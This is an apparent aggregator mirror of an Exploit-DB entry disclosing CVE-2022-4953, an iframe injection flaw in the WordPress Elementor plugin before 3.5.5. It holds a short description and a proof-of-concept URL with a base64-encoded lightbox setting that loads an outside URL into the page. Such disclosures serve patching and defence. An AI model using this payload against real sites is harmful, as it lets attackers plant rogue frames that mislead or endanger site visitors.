3

[webapps] Wordpress Plugin Elementor 3.5.5 - Iframe Injection

 9 months ago
source link: https://www.exploit-db.com/exploits/51716
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

EDB-ID:

51716

EDB Verified:

Platform:

PHP

Date:

2023-09-08

Vulnerable App:

# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953

# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.


# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
            

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK